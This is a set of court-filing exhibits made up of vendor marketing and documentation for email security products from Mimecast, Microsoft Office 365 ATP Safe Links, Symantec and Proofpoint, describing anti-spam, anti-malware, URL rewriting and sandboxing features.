Once in place, email security infrastructure is a key component of your business protection, mitigating risks and reducing exposure to third-party threats. However it needs to be a coherent, easy-to-manage system. That's seldom the case if you have a patchwork of systems each that were put into place to answer specific threats. Separate anti-virus tools sit next to anti-spam appliances, getting updates on different schedules, while data loss prevention tools add to the complexity. Managing them all is another complex task, as they'll each have their own management tools, and system administrators will find themselves working with a mix of web user interfaces, remote desktops, and console applications. Making sure everything is up to date becomes a full time task, not to mention testing rules and updated applications to ensure they don't affect your business processes – an updated spam filter that stops customer emails from arriving is something no one wants.





There's another problem that's exacerbated by the complexity of managing your own email security infrastructure: the window of vulnerability. Email security is an arms race with spammers, phishers and malware authors – and they will often have the upper hand. Filters and signatures can only be updated after attacks have been identified and categorized, so you'll be left waiting for updates to be tested and installed hours or days after the bad guys have started using the loophole you're waiting to close. Fifty percent of systems are still unpatched 60 days after patches are released – that's a long time to risk getting infected with malware.

Case 0:20-cv-60416-XXXX Document 1-2 Entered on FLSD Docket 02/26/2020 Page 632 of 726

# Making security a service

Treating security as just a series of defenses doesn't give you much opportunity to differentiate your business. The place to add value and improve productivity is through what you enable with security.

## Security in the cloud

You could outsource the management of your on-premise email infrastructure, but the problems (and costs) of the DIY security architecture remain. The alternative is to shift the burden of management off the IT department by moving it out of your network completely. This approach is often partially in place, with anti-spam facilities already outsourced to services that partly or wholly run in the cloud. Important as they are, anti-spam and anti-virus services are only part of the security story, especially in light of the current regulatory environment. Putting all your email security in the cloud will relieve your IT department of a considerable burden. There's no need to test patches, no need to wait for updates to install – and above all, little or no down time.

## Security with Mimecast: at rest, in transit and in use

Mimecast's unified email management service provides a lot more than email management and business continuity. It's a complete email risk management and compliance platform, able to protect your mail while it's stored, when users are working with it, and while it's being sent and received. The layers of protection include anti-malware tools, anti-spam, anti-phishing, Denial of Service protection, policy enforcement and encrypted storage.

Email is one of the main gateways into your business, and its security is a key requirement at all times. Regulatory requirements mean that a larger proportion of email now needs to be stored for many years, and you need to be sure that its integrity is preserved, and that full audit trails exist to show just who looked at a message, and where and when. That's all part of the role of Mimecast's security platform, which aims to ensure that your mail is always secure, whenever and wherever it's being read.

**A well-designed security system needs to provide businesses with four key features:**

- It needs to be available at all times, to the appropriate users
- It needs to provide a business with the means to ensure the integrity of its systems
- It needs to be confidential (making sure that only your company and partners can access mail and mail based processes)
- It needs to give you the means to control user actions

Delivering all four is a complex task, and requires a mix of tools and technologies making it well suited to a cloud service.







Case 0:20-cv-60416-XXXX   Document 1-2   Entered on FLSD Docket 02/26/2020   Page 633 of 726

# Making security a service

## Anti-malware

No two anti-malware tools are identical. They all work differently, and they all update on different schedules. Some push out updates to their signature files every few minutes, with weekly or even daily updates to their engines. Others are slower, but offer a wider range of anti-virus features. It's important to use a mix of different anti-virus engines if you want to keep a network as secure as possible with as wide as possible coverage. If one engine is being updated, the others will still be working, and messages will continue to flow, but if you're doing this in house you'll need to find a way of staggering updates.

Building a suite of anti-malware tools takes time, as you need to continually monitor evolving threats and available technologies in the market. Another good reason to work with a cloud service is it can use its dedicated resources to ensure you always have the best in class anti-virus tools protecting your mail. That's why Mimecast uses multiple anti-malware technologies from Cloudmark, Commtouch, Clam, AVG, Eset and its own anti-malware stack. Intrusion Prevention tools look for not just traditional malware, but also specially crafted attacks that take advantage of application and operating system vulnerabilities.



## Anti-spam

The same is true of anti-spam tools and services. An effective anti-spam solution is a mix of different tools and approaches. Producing the most effective blend requires significant investment – and continual monitoring. False positives need to be kept to a minimum, as do false negatives. With spam techniques and sources changing from hour to hour and day to day, an email security network needs to be able to respond quickly, something that's difficult for a small network without full-time support. By using a cloud service, both large and small business get access to enterprise-grade tools and software, as well as the enterprise-grade staffing and support needed to keep the service running.



Effective anti-spam protection also comes from accurate reputation services. Mail accepted by a customer of a cloud email service will count towards the reputation score of the sender, and mail that's rejected will compromise that reputation. Low reputation scores can mean a message is automatically flagged as spam, stopping you being able to email some companies at all.

Maintaining your email reputation with cloud services like Mimecast will avoid this problem. While on-premise mail services can subscribe to reputation services, they can be hard to manage, and it's often unclear what the source of, or how accurate, the reputation data is. A cloud service with many clients will automatically have a large and diverse user base from which to build its own reputation service, so you get effective protection.

# Making security a service

Phishing messages that try to trick users into revealing bank account or confidential corporate information are still a serious problem. Finely targeted so-called 'spear-phishing' attacks are on the increase too. A cloud mail service can protect its clients by using a dynamic URL list of known phishing sites; Mimecast constantly refreshes and updates this list and proactively checks new domain registrations to see if they need to be added to the list – particularly looking for new registrations that are a deliberate mis-spelling or lookalike of a financial or commercial domain. Phishing messages often contain similar contents; with a large enough number of messages you can create fingerprints to help detect current and future versions of the attack and Mimecast updates its fingerprint database every 45 seconds.

## Zero-day protection

It's hard for a single-site mail system to offer effective zero-day protection against new threats. The key to effective zero-day protection is working with an enormous number of incoming emails, looking for the signs of a malware outbreak or a new type of spam. Any zero-day protection scheme needs to be able to identify possible malware, and quarantine it before it can be delivered to your users. Mimecast's Zero Hour Adaptive Risk Assessor (ZHARA™) examines suspicious messages as part of the process of splitting them into isolated pieces for processing and storage in the Mimecast grid.

Possible malware is automatically routed to the Dark Traffic, Analysis Group to be reverse engineered. The system also monitors the pattern of incoming connections and the profile of traffic from mail servers to look for unusual behavior and help protect against distributed Denial of Service attacks. None of this is possible unless you're dealing with a large enough amount of email to receive new threats quickly and you have the expertise to detect and remediate problems. In addition to the tens-of-millions of emails Mimecast deals with on behalf of its customers every day, Mimecast uses a network of honeypots to gather spam and malware in the wild, proactively protecting customers from attack.

Cloud services like Mimecast can provide security without compromising email delivery speed; email is an important business tool and it needs to be delivered in a timely fashion. With this combination of pro-active techniques, Mimecast is able to stop an average of 99.5% of malware and spam at the protocol level, without needing to analyze the content. And even though it uses a variety of detection engines to ensure all threats are detected, the Mimecast Mail Transfer Agent, ARMed SMTP™ undertakes much of the analysis in parallel to avoid slowing down email to an unacceptable level.





# Making security a service

## Policy enforcement

Email security isn't just about protecting your staff from threats in incoming messages. It's also about managing the content of the messages they sent. Controlling exactly what information leaves your network is becoming increasingly important, to protect customer data and to make sure your business complies with the appropriate regulations. It's also important to make sure that you apply appropriate controls based on user roles: your CEO is likely to want to be able to send anything, while your customer service staff probably don't need to be able to send attachments or messages that contain customers' personal information.

This is where policy enforcement tools come into play. A cloud service will be able to give you one dashboard where you can control everything from user access to mail, to what they can send – and to whom. Data loss prevention tools let you scan for key words and phrases to make sure sensitive information isn't leaving your company, and the same tools help you ensure your business complies with all the appropriate regulations. Policy enforcement tools can also be used to make sure that all mail you and your staff send is encrypted, and signed with appropriate digital signatures – giving you a level of integrity and non-repudiation that is hard to match with conventional on-premise mail tools.

Mimecast offers TLS (Transport Layer Security) encryption, sending messages through a secure tunnel to the target mail server, which can be triggered by the domain, the specific email address or keywords in the subject or body of the message. If the target mail server doesn't support TLS, Mimecast can utilize 'closed circuit' messaging to deliver it through secure Webmail; that gives tamper proof secure mail with non-repudiation without having to exchange digital certificates in advance. And when staff need to share files with customers, partners or vendors but you don't want the risk of an attachment leaving the business or can't guarantee the receiving server can handle the attachment type or size, Mimecast can automatically strip the attachment and replace it with a URL for accessing the file on a secure Mimecast Web server.







# Making security a service

## Audit trails

In the cloud doesn't mean out of sight; with Mimecast you can still view a complete audit trail for your mail, indicating who sent it, who read it (and how many times), and even where they read it. Audit trails give you the tools you need to ensure that your users aren't attempting to circumvent regulatory restrictions, as well as giving you the assurance that you will be able to provide proof of user actions if regulators or legal actions require it.



## Securing the cloud

Your mail may be secure as it travels across the Internet, but what about the cloud service that's hosting your mail? It needs to be able to protect itself (and your mail) from Denial of Service attacks, it also needs to make sure that your mail is strongly encrypted and partitioned well away from any other customers – using different encryption keys to ensure that only you and your staff can access your mail. Mimecast's storage grid is separate from its processing grid, and spreads stored email across multiple geographically dispersed data centres in each territory ensuring data is stored in its jurisdiction. Content is stored using AES 256 encryption, and the keys are fragmented across the grid, reducing the risk of anyone accessing your mail either inadvertently or deliberately.



Case 0:20-cv-60416-XXXX Document 1-42 Entered on FLSB Docket 02/26/2020 Page 12 of 25

# Security is holistic

### Scaled-up security

Outsourcing your email security to a cloud service gives you a full-time security service. Cloud services support large numbers of users, and economies of scale mean that they have staff dedicated to manage their security tools. Heuristic spam and malware detection tools running in the cloud can detect problematic messages quickly, because scanning all the messages targeted at all their clients' mailboxes gives them so much material to work with. Malware patterns will show up quickly, and detection rules will be applied as soon as they have been reliably developed.

These techniques mean that cloud services have a very short, or non-existent, window of vulnerability to new spam and malware messages. A cloud service can also offer increased protection by using several protection mechanisms – typically using several anti-malware and anti-spam tools, or more than one heuristic analysis tool. With more tools, your email presents a much smaller attack surface, reducing your business risk. You could run multiple protection tools in house, but that increases the burden of management and can reduce the performance of your mail servers.

One area where cloud services excel is helping to calculate ROI. A single place to manage all your email security means there's one place to get reports on system performance. A per-user billing cycle also means that it's easy to tie costs to departments and specific business processes, making it easier to calculate the service ROI. A fixed fee also makes it easier to include the service costs in departmental budgets, rather than lumping costs into a single annual IT budget. There's another benefit too, in the shape of no capital costs. All the equipment needed to run an email security service is hosted and managed by the cloud service provider – so there's no need to budget for new servers and security appliances.

Cloud services are designed to do one thing and to do it well, so by entrusting your email security to a cloud provider you're working with experts. Of course no two services are the same, so you should evaluate the capabilities of your chosen service carefully, to ensure suitability with your needs.

Security may be part of your wider business issues, but it's also a fundamental IT issue. Unless security is part of your business' core expertise you'll be able to reduce risk, cost and complexity by using cloud services to achieve unified security. Keeping your email in the cloud ensures you can keep it secure and make it universally accessible, therefore extracting the business value from it without any of the usual disadvantages. With cloud security like Mimecast's you could derisk email and turn it into a true business resource.





Mimecast is a leading provider of essential cloud services for Microsoft Exchange. Mimecast delivers enterprise email management services that include security, continuity and archiving. This suite of services provides total end-to-end control of business email, while minimizing risk and reducing both cost and complexity. Founded in 2003, Mimecast serves thousands of customers worldwide and has offices in Europe, North America and Africa.

© 2011 Mimecast. ALL RIGHTS RESERVED.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 639 of 726

# EXHIBIT 41

**mimecast**®

**DATASHEET**

# Mimecast Broad Spectrum Email Security for Office 365

## A cloud-based email security layer for Office 365 that reduces risk and combats targeted threats in email

The Mimecast Broad Spectrum Email Security for Office 365 service is a multifaceted Secure Email Gateway that overlays Microsoft® Office 365™ and Exchange™ Online Protection with a blended cloud security solution. As email remains the primary attack vector for enterprises, many have deployed a multi-layered, defense-in-depth approach to security on the network. Moving to Office 365 often means these layers are compressed into a single vendor. With Mimecast working alongside Office 365 this multi-layered approach remains intact, so dealing with advanced threats in email, like spear-phishing, are easily managed in the cloud.

### FEATURES:

- Always-on, cloud-based email security service overlaying Office 365

- Helps stop spam and malware in the cloud and protects users from spear-phishing URLs in email

- Targeted Threat Protection for spear-phishing protection is fully integrated with Mimecast Secure Email Gateway, Mimecast ZHARA™ (Zero Hour Adaptive Risk Assessor) and ARMed SMTP™ (Advanced Reputation Management SMTP) security technologies

- On-click, every-click, real-time URL scanning provides constant protection on all devices and clients

- Real-time logging with granular filters, auditing and reporting to allow administrator oversight

- No client software required

### BENEFITS AT A GLANCE:

- Comprehensive protection against spear-phishing and targeted attacks for Office 365 customers

- Real-time, on-click, every click URL protection against clean websites subsequently becoming compromised, or delayed exploits

- Instant protection across all devices - desktop and mobile, corporate and personally-owned – with no disruption to users

- Rapid deployment centrally managed with simple routing controls for Office 365 integrations

- Single administration console and controls for easy, holistic security monitoring and reporting

Case 0:20-cv-60416-XXXX   Document 3-13   Entered on FLSD Docket 02/26/2020   Page 3 of 5

## mimecast®

**DATASHEET**

### Mimecast Broad Spectrum Email Security for Office 365

Mimecast Broad Spectrum Email Security for Office 365 brings enterprise multi-layered defense-in-depth email security to Office 365. Organizations have built significant email security infrastructures on their networks, but when it comes time to migrate email to the cloud or Office 365, much of this protection can be lost, and security is forced into a single vendor delivery model.

Adding Mimecast's security technologies as an overlay to Office 365 provides a solution to this multi-layered security problem by delivering advanced protections for today's most common forms of attack beyond routine spam and virus. Mimecast's Targeted Threat Protection is an advanced cloud solution for protection against spear-phishing and targeted attacks.

### Targeted Threat Protection

Targeted Threat Protection is an advanced email security technology that is an additional component of the Mimecast Secure Email Gateway. As emails are delivered through the Mimecast Secure Email Gateway in the cloud, Targeted Threat Protection, when enabled, rewrites all URLs and links to websites in every email. URL rewriting of every single link removes uncertainty about whether or not end users are protected from spear-phishing. It also removes additional gateway processing overhead or latency that is often introduced.

### Every Click, Every Device

Because Mimecast Targeted Threat protection rewrites all URLs and links in all emails, end users are protected on every device and client; whether they use Microsoft Outlook, their corporate smartphone or their own personally-owned device or computer.

### Increased Protection

Mimecast's massively scalable MTA becomes your email bridgehead in the cloud. Email related threats such as malware, spam, phishing attacks, denial of service and directory harvest attacks are all stopped before they reach Office 365.

### Enhanced Visibility and Control

Organization-wide email security policies are managed from a single interface and can be applied immediately, enabling you to respond rapidly to evolving situations. Advanced monitoring functionality gives you real-time views of your SMTP traffic and offers online queue management and advanced routing capability, to ensure that you stay in control of your cloud based email infrastructure.

## Microsoft Partner

Gold   Application Development
Gold   Messaging

**mimecast®**

## DATASHEET

### How it works

**Simple to Deploy, Simple to Manage**

· Switch corporate MX records to point to the Mimecast platform

· Route all inbound traffic through the Mimecast platform then onto Office 365

· Simple routing controls allow for diverse, backup and multiple email routing policies, supporting cloud and hybrid configurations

· Suspicious, non-MTA compliant, and botnet-based connections are dropped in protocol

· Zero-hour threat analysis performed to identify emerging threats

· Messages found to contain malware are automatically rejected prior to receipt

· Targeted Threat Protection automatically re-writes URLs in emails to protect users from spear-phishing

· Secure delivery methods invoked based on message content, sender, or recipient rules

· Online traffic analysis available for managing live messages



Case 0:20-cv-60416-XXXX   Document 3-43   Entered on FLSD Docket 02/26/2020   Page 643 of 726

# mimecast ®

## DATASHEET

**Mimecast Broad Spectrum**
**Email Security for Office 365 - Features**

| **Mimecast service platform** |
| --- |
| Centrally administered via single, web-based administration console |
| Mimecast Webmail portal for user access to held messages |
| Backed by 100% service availability SLA |
| Automated synchronization with company directory |
| Monitoring dashboard for email queues and synchronisation services |
| Customizable SMS and email alerting of potential email service problems |
| Assignment of administrators to pre-defined or customizable roles with associated permissions |
| **Advanced MTA capability** |
| Advanced routing capability |
| Real-time view of all SMTP connections and rejections |
| Online queue management |
| Detailed transmission data for every email that is processed by Mimecast |
| Reports of email usage patterns |
| Protection from email-based attacks e.g. denial of service (DoS), directory harvest attacks (DHA) |
| **Email Threat Protection** |
| Multi-layered malware protection against known and zero-day threats |
| Comprehensive connection-based and content-based spam and phishing protection |
| Personal permit and block lists to fine tune spam preferences |
| End user email digests for personal quarantine management |
| SLAs: 100% virus protection; 99% spam protection; 0.0001% spam false positives |

Mimecast makes business email and data safer for more than 13,000 customers and millions of employees worldwide. Founded in 2003, the Company's cloud-based security, archiving and continuity services protect email, and deliver comprehensive email risk management in a single, fully-integrated subscription service. Mimecast reduces email risk and the complexity and cost of managing the array of point solutions traditionally used to protect email and its data. For customers that have migrated to cloud services like Microsoft Office 365, Mimecast mitigates single vendor exposure by strengthening security coverage, combating downtime and improving archiving.

Mimecast Email Security protects against malware, spam, advanced phishing and other emerging attacks, while preventing data leaks. Mimecast Mailbox Continuity enables employees to continue using email during planned and unplanned outages. Mimecast Information Archiving unifies email, file and Instant Messaging data to support e-discovery and give employees fast access to their personal archive via PC, Mac and mobile apps.



**SCHEDULE A MEETING** ›
Let us demonstrate how to make email safer in your organization.
www.mimecast.com/request-demo



**CHAT WITH SALES** ›
Got a question? Get it answered by a Mimecast expert.
www.mimecast.com/contact-sales



**GET A QUOTE** ›
Tell us what you need and we'll craft a customized quote.
www.mimecast.com/quote

Case 0:20-cv-60416-XXXX Document 3-44 Entered on FLSD Docket 02/26/2020 Page 1 of 3

# EXHIBIT 42

Case 0:20-cv-60416-XXXC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 645 of
726
Case 0:20-cv-60416-XXXC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 2 of 3



Microsoft

☰                     Sign in                     🔍

Office 365  /  Advanced Threat Protection  /  How ATP works  /  How ATP Safe Links works

🔖  ⬆️  ☀️  Sign in                                          ☰ Contents

# How Office 365 ATP Safe Links works

05/19/2019 • 2 minutes to read • 🌐 👥 👤

**In this article**

How ATP Safe Links works with URLs in email

How ATP Safe Links works with URLs in Office documents

## How ATP Safe Links works with URLs in email

At a high level, here's how ATP Safe Links protection works for URLs in email (hosted in Office 365, not on-premises):

1. People receive email messages, some of which contain URLs.

2. All email goes through Exchange Online Protection, where internet protocol (IP) and envelope filters, signature-based malware protection, anti-spam and anti-malware filters are applied.

3. Email arrives in people's inboxes.

4. A user signs in to Office 365, and goes to their email inbox.

5. The user opens an email message, and clicks on a URL in the email message.

6. The ATP Safe Links feature immediately checks the URL before opening the website. The URL is identified as blocked, malicious, or safe.

   - If the URL is to a website that is included in a custom "Do not rewrite" URLs list for a policy that applies to the user, the website opens.

   - If the URL is to a website that is included in the organization's custom blocked URLs list, a warning page opens.

   - If the URL is to a website that has been determined to be malicious, a warning page opens.

   - If the URL goes to a downloadable file and your organization's ATP Safe Links policies are configured to scan such content, the downloadable file is checked.

   - If the URL is determined to be safe, the website opens.

# How ATP Safe Links works with URLs in Office documents

At a high level, here's how [ATP Safe Links](#) protection works for URLs in Office 365 ProPlus applications (current versions of Word, Excel, and PowerPoint on Windows or Mac, Office apps on iOS or Android devices, Visio on Windows, OneNote in a browser, and Office in a browser):

1. People have installed Office 365 ProPlus on their computer, smartphone, or tablet. (Or, they are using Office in their browser.)

2. A user opens a Word, Excel, PowerPoint, or Visio, and signs in to Office 365 Enterprise using their work or school account. The document contains URLs.

3. When the user clicks on a URL in the document, the link is checked by the ATP Safe Links service.

   - If the URL is to a website that is included in a [custom "Do not rewrite" URLs list](#) for a policy that applies to the user, that user is taken to the website.

   - If the URL is to a website that is included in the organization's [custom blocked URLs list](#), the user is taken to a [warning page](#).

   - If the URL is to a website that has been determined to be malicious, the user is taken to a [warning page](#).

   - If the URL goes to a downloadable file and the [ATP Safe Links policies](#) are configured to scan such downloads, the downloadable file is checked.

   - If the URL is considered safe, the user is taken to the website.

---

## Is this page helpful?

👍 Yes   👎 No

---

🌐 English (United States)

Previous Version Docs   •   Blog   •   Contribute   •   Privacy & Cookies   •   Terms of Use   •   Site Feedback   •   Trademarks

Case 0:20-cv-60416-XXXX   Document 3-45   Entered on FLSD Docket 02/26/2020   Page 1 of 5

# EXHIBIT 43



# Symantec Email Threat Detection and Response

Stop targeted and advanced email attacks with powerful protection that includes complete visibility, prioritized response, and automated remediation

## Prevent the Most Advanced Email Attacks

Symantec Email Threat Detection and Response is a cloud-based service that uncovers and prioritizes advanced attacks entering your organization through email by adding advanced detection technologies such as cloud-based sandboxing and click-time URL protection to the Symantec Email Security.cloud service. In addition, it helps accelerate your response to targeted and advanced threats with advanced email security analytics that provide the deepest visibility into targeted & advanced attack campaigns. This intelligence includes insights into both clean and malicious emails as well as more Indicators of Compromise

(IOCs) than any other vendor, with 60+ data points such as URLs, file hashes, and targeted attack information.

You can export this data to your Security Operations Center to quickly determine the severity and scope of any targeted or advanced attack. Furthermore, you can quickly remediate email attacks by automatically blacklisting Indicators of Compromise (IOCs) found while hunting threats. Moreover, Email Threat Detection and Response reduces the risk of phishing by preparing your users to recognize the latest phishing attacks with built-in security awareness training. Finally, when used alongside Symantec Endpoint Detection and Response and the Secure Web Gateway family to detect advanced threats, you can automatically correlate events across all control points.

## Cloud-based Sandboxing

Email Threat Detection and Response customers can leverage cloud-based sandboxing capabilities to discover and prioritize today's most complex targeted & advanced attacks. This service uses advanced machine learning, network traffic analysis, and behavior analysis to detect even the most stealthy and persistent threats. In addition, it's infused with security telemetry from the Symantec Global Intelligence Network, the world's largest civilian threat intelligence network. The Symantec Global Intelligence Network provides comprehensive visibility into the threat landscape and delivers better security

outcomes by collecting and analyzing security telemetry from more than 175 million endpoints, 80 million web proxy users, and 8 billion daily security requests across 157 countries. Our cloud-based sandboxing also provides you the details of malicious files and their execution actions, so that all relevant attack components can be quickly investigated and remediated. Today, many advanced attacks are "virtual machine-aware," which means they don't reveal suspicious behavior when run in typical sandboxing systems. To combat this, Symantec employs techniques to mimic human behavior and executes suspicious files both virtually and on physical hardware to uncover attacks that evade detection by traditional sandboxing technologies.

# Click-Time URL Protection

Click-Time URL Protection blocks malicious links by analyzing them when they are clicked by end-users to protect against spear phishing attacks that weaponize a link after an email is delivered. This complements Real-Time Link Following technology in Symantec Email Security.cloud, which blocks malicious links used in spear phishing attacks before an email is delivered. Unlike other solutions that rely on reactive blacklists or signatures to stop spear phishing attacks, Symantec proactively stops both new and known spear phishing attacks that employ malicious links by performing deep evaluation of links in real-time. This deep evaluation follows links to their final destination, even when attackers use sophisticated techniques such as multiple redirects, shortened URLs, hijacked URLs, and time-based delays that bypass detection by traditional security solutions. Any files found at the destination URL are downloaded and deep heuristic analysis is performed to determine whether they are malware. This deep link evaluation powers both Click-Time URL Protection and Real-Time Link Following, which enables Symantec to provide the most effective protection against spear phishing, targeted attacks, and other advanced threats that contain malicious links.

# Advanced Email Security Analytics

Email Threat Detection and Response helps accelerate your response to targeted & advanced threats with advanced email security analytics that provide the deepest visibility into email attack campaigns. This rich intelligence includes detailed reporting on every clean and malicious email entering your organization. These reports include 60+ data points including IOCs such as source URLs of an attack, targeted attack information, malware categorization, sender & recipient information, method of detection, clicked re-written URLs and detailed information about file hashes. Each attack is assigned a threat category, such as Trojan or Infostealer, and a severity level of low, medium, or high to indicate the level of sophistication of an attack. You can even search and find detailed information about blocked emails, including both the original link in an email and the final destination link containing malware as determined by Real-Time Link Following. These advanced analytics give comprehensive insights into targeted & advanced threats against your organization by offering more IOCs than any other email vendor.



Case 0:20-cv-60416-XXXX   Document 3-15   Entered on FLSD Docket 02/26/2020   Page 650 of 726

# Security Operations Center Integration

Email Threat Detection and Response enables you to easily export the advanced email security analytics on clean and malicious emails to your Security Operations Center (SOC) through integration with third-party SIEMs such as Splunk, IBM QRadar, HPE ArcSight, and more. Threat intelligence data is streamed directly to your SIEM via a granular, API-driven feed to give your security team rapid visibility into threats. Security analysts can leverage this data to quickly correlate and analyze threats when investigating and responding to threats. Moreover, you can easily respond to email threats with a free Splunk or IBM QRadar app, which allows you to export the advanced email security analytics directly to Splunk or QRadar. This apps provide deep visibility into the threat landscape with data points such as malicious URLs and file hashes as well as information such as high-risk users, a geographical view of incoming attacks, and a timeline of email malware.

You can speed-up detection and response of targeted & advanced threats by exporting our advanced email security analytics to Symantec Information Centric Analytics (ICA), Symantec Integrated Cyber Defense Exchange (ICDx), or Symantec Managed Security Services (MSS). Symantec ICA helps you understand and prioritize the riskiest threats to your organization by correlating email analytics with broader security and user behavior analytics. Symantec ICDx streamlines threat response by collecting, filtering, and forwarding security analytics across your environment to your SOC. Finally, Symantec MSS enables you to monitor email security logs via the API-driven feed.

# Automated Remediation

Security teams frequently come across IOCs when responding to an attack or while correlating and hunting threats in your environment. However, remediation is often slow and cumbersome even once these threats are discovered, as IOCs are typically blacklisted manually. This delays response time and increases remediation workloads, which can be critical for security teams dealing with hundreds or even thousands of incidents at a time.

Email Threat Detection and Response allows you to quickly respond to targeted & advanced attacks by automatically remediating email threats. These capabilities speed incident response by automatically blacklisting IOCs such as file hashes, IP addresses, and sender & recipient information via an API. Furthermore, security teams can blacklist threats through the admin console. Blacklisting these IOCs protects your organization from newly discovered threats, decreases the time to remediate attacks, and improves your overall security posture, while increasing the productivity of your security team. Moreover, in case any threats get through our defenses, Email Threat Detection and Response automatically removes these emails from Office 365 inboxes before your users can open them.



Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 651 of

## Security Awareness Training

Email Threat Detection and Response includes security awareness training, which reduces the risk of phishing by evaluating user readiness to phishing threats while helping you identify and train the most vulnerable users in your organization on phishing attacks. Customizable security assessments enable you to assess user readiness to phishing attacks by simulating the latest real-world phishing threats across your organization. After simulating an attack, detailed reporting and executive dashboards help you benchmark employee readiness and pinpoint the most susceptible users. Finally, you can improve user readiness to phishing threats by using training notifications to educate users on new & emerging phishing attacks and performing repeat assessments to track readiness over time.

## Consolidated View Across Control Points

Email Threat Detection and Response integrates with Symantec Endpoint Detection and Response and works alongside the Secure Web Gateway family to detect advanced threats that evade individual point products. This is powered by Symantec's massive global intelligence network and includes the ability to automatically correlate threats across all control points via Symantec Endpoint Detection and Response.

## Key Capabilities

- Detect complex and stealthy advanced attacks with cloud-based sandboxing capabilities

- Stop malicious links weaponized after email delivery with Click-Time URL Protection, which helps provide the strongest protection against spear phishing, targeted attacks, and other advanced threats

- Accelerate response to targeted and advanced attacks through advanced email security analytics that provide the deepest visibility into email attack campaigns with 60+ data points on every clean and malicious email

- Quickly correlate and respond to threats by exporting advanced email security analytics to your Security Operations Center through integration with third-party SIEMs, Symantec ICA, Symantec ICDx, and Symantec MSS

- Decrease remediation time while preventing newly discovered threats with automatic blacklisting of IOCs found in your security environment

- Reduce the risk of phishing with security awareness training that prepares your users for phishing attacks and helps you prioritize protection for the most vulnerable users in your organization

- Correlate suspicious activity across all control points to identify and prioritize security events that pose the most risk you

**About Symantec**

Symantec Corporation (NASDAQ: SYMC), the world's leading cyber security company, helps organizations, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure. Likewise, a global community of more than 50 million people and families rely on Symantec's Norton and LifeLock product suites to protect their digital lives at home and across their devices. Symantec operates one of the world's largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please visit www.symantec.com, subscribe to our blogs, or connect with us on Facebook, Twitter, and LinkedIn.



350 Ellis St., Mountain View, CA 94043 USA  |  +1 (650) 527 8000  |  1 (800) 721 3934  |  www.symantec.com

Copyright © 2019 Symantec Corporation. All rights reserved. Symantec, the Symantec Logo, and the Checkmark Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

19D214144_DS_EMAIL_THREAT_DETECTION_RESPONSE_EN

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 652 of 726

# EXHIBIT 44

**December 2018**

**Symantec.**



## Product Updates
## Symantec Email Security.cloud

**Latest Release Highlights**



# New Sender Detection Features

The latest Symantec Email Security.cloud release introduces enhancements to the Anti-Spam Spoofed Sender Detection settings. These detection settings help you to protect your organization against fraudulent and phishing emails. The Anti-Spam service now lets you apply custom actions to emails that fail SPF or DMARC validation, just as you can for other anti-spam detection types. These new actions allow you to evaluate the impact of enabling SPF and DMARC validation before deciding to trust a sender's policies.



**Learn More**



# Click-time URL Protection

The Click-time URL Protection service is available to organizations that use Symantec Advanced Threat Protection: Email. The Click-time URL Protection service "rewrites" and performs checks on URLs in emails that are delivered to your organization's end users. The process of rewriting allows the service to manage access to the URL to ensure the destination is innocuous. Any URL that is rewritten by Click-time URL Protection is checked every time an end-user clicks on it, to ensure the URL destination is not hosting malware, phishing, or spam threats. Recipient URL Protection has been added to the Click-time URL Protection service. All of your users are protected by Click-time URL Protection by default, but you can now choose to protect only certain users and exclude others from processing.





**Improve Your Email Security Posture**
**Revisit These Useful Best Practices Webinars (On-Demand)**

Case 0:20-cv-60416-XXXX Document 3-46 Entered on FLSD Docket 02/26/2020 Page 4 of 7



# Policy Based Encryption Best Practices

In this webinar, we'll explore the Symantec Policy Based Encryptions service – highlighting how it works, how to trigger a policy, and the user experience. We'll also cover advanced features and industry best practices to equip you with the tools needed to protect your organization.



Watch Webinar

Case 0:20-cv-60416-XXXX   Document 3-46   Entered on FLSD Docket 02/26/2020   Page 5 of 7



# Securing Office 365 from Threats

Adoption of cloud services like Office 365 adds simplicity to business services. However, it has also added significant complexity to the traditional security infrastructure. This technical webinar will teach you how to utilize the Symantec Email Security.cloud service to protect against advanced threats.



Watch Webinar



Case 0:20-cv-60416-XXXX    Document 3-46    Entered on FLSD Docket 02/26/2020    Page 5 of 7
Case 0:20-cv-60416-AMC    Document 3-1    Entered on FLSD Docket 02/26/2020    Page 657 of
726

# How to Optimally Configure Email Security.cloud

Take full advantage of the industry's most complete email security solution by properly configuring your Symantec Email Security.cloud solution. In this webinar we will take you through the Email Security.cloud administration console and highlight key protection features that every organization should enable to protect themselves against malware, phishing and spam emails.



Watch Webinar



# How Can Your Organization Safeguard Against Phishing Emails?

Spear-phishing emails emerged as by far the most widely used infection

Case 0:20-cv-60416-XXXX   Document 3-16   Entered on FLSD Docket 02/26/2020   Page 7 of 7

vector in 2017, employed by 71 percent of targeted attack groups according to findings in our latest Email Security Threat Report. In this webinar we will demonstrate how to optimize the configurations of your Symantec Email Security.cloud service to protect your organization.





FOLLOW US:   

© 2018 Symantec Corporation. All rights reserved. Symantec, the Symantec Logo, and the Checkmark Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

Symantec Corporation, 350 Ellis Street, Mountain View, CA 94043 United States of America

PRIVACY POLICY

# EXHIBIT 45





# Administrator Guide

Proofpoint Essentials



April 2016

*Preface* ...................................................................................................................................................... *5*

**About this Guide**  ................................................................................................................................ **5**

**Intended Audience and Prerequisite Knowledge**  ............................................................................. **5**

**Other Sources of Information**  ........................................................................................................... **5**

*Introduction to Proofpoint Essentials* ......................................................................................................... *6*

**Proofpoint Essentials: Part of the Proofpoint Family**  ..................................................................... **6**

**Proofpoint Essentials Overview** ......................................................................................................... **6**

Email Filtering Overview  ................................................................................................................ 6

Features and Capabilities  ............................................................................................................... 6

Service Architecture  ....................................................................................................................... 8

Real-‐‐Time / Reliable Spam Detection  ........................................................................................... 8

Message Processing Order  .............................................................................................................. 8

**Best Practices**  .................................................................................................................................. **10**

